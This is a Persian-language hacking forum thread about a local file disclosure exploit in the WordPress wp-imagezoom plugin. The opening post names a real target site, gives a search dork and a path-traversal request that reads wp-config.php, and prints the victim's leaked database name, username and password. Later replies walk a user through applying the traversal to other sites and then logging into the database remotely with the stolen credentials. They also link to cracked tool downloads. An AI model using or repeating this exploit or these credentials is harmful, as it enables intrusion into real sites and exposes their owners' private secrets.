SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Wp-imagezoom LFD Exploit

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Wp-imagezoom LFD Exploit

    [align=LEFT]
    کد:
    Local File Disclosure (LFD)


inurl  : wp-content/plugins/wp-imagezoom

Target : http://estanciarural.com/anuncio/wp-content/plugins/wp-imagezoom/

usage  : download.php?file=../../../wp-config.php


define('DB_NAME', 'ahosta43_wrdp28');
/** MySQL database username */
define('DB_USER', 'ahosta43_wrdp28');
/** MySQL database password */
define('DB_PASSWORD', '{OkdhkbQod8W');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
    [/align]
    [align=center][/align]
    برچسب ها: هیچ یک
  • #2
    RE: Wp-imagezoom LFD Exploit

    چطور میشه از این اکسبلویت در باگ ال اف دی استفاده کرد ؟
    میشه توضیح بدید ؟
    ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

    نظر

    • #3
      RE: Wp-imagezoom LFD Exploit

      درود
      ابتدا تارگت خودتون رو انتخاب میکنید حالا چه از طریق دورک پیداش میکنید و یا هرچیز دیگه و سپس به آدرس زیر رفته :
      [align=left]
      کد:
      wp-content/plugins/wp-imagezoom/
      [/align]
      سپس به صفحه ی download.php مراجعه کنید و به شمل زیر، فایل php مورد نظرتون رو مشاهده کنید که هر فایلی میتونه باشه مثل ایندکس و یا کانفیگ :
      [align=left]
      کد:
      download.php?file=../../../file.php
      [/align]
      بدرود..
       
      [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

      همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
       

      نظر

      • #4
        RE: Wp-imagezoom LFD Exploit

        خب ما اینجا تمامی کارها رو انجام دادیم و به کانفیگ دسترسی پیدا کده و آنرا خواندیم. برای وارد شدن به صفحه Php MyAmin چطور باید عمل کنیم؟


        حسین جان یه نرم افزار بود میشه لینک بدی؟ اگر روش دیگه ای هم هست دوستان ذکر کنند متشکریم .... ♥
        نام کاربری و فعالیت مجدد به 3cure تعلق و تغییر یافت...

        نظر

        • #5
          RE: Wp-imagezoom LFD Exploit

          اگر قابلیت ریموت از سمت سرور محدود نباشه میتونی ریموت connect بشی ، اگر phpmyadmin روی سرور باز باشه یا با پورت 3306 یا url

          کد:
          site.com/phpmyadmin
site.com:3306
          باز هم میتونی متصل بشی از طریق یوزر و پس دیتابیسی که از کانفیگ گرفتی .

          اون نرم افزار هم SQL YOG نام داره که میتونی از لینک زیر دریافت کنی :

          نسخه 32 بیتی :

          http://uploaderx.persiangig.com/tools/SQLYog.Ultimate.11.1.1.0_32_bit.zip

          نسخه 64 بیتی :

          http://uploaderx.persiangig.com/tools/SQLYog.Ultimate.11.1.1.0_64_bit.zip

          ابزار های بیشتر هم در قسمت :

          http://iranhack.com/tools
          [align=center][/align]

          نظر

          قبلی template بعدی
          صبر کنید ..
          X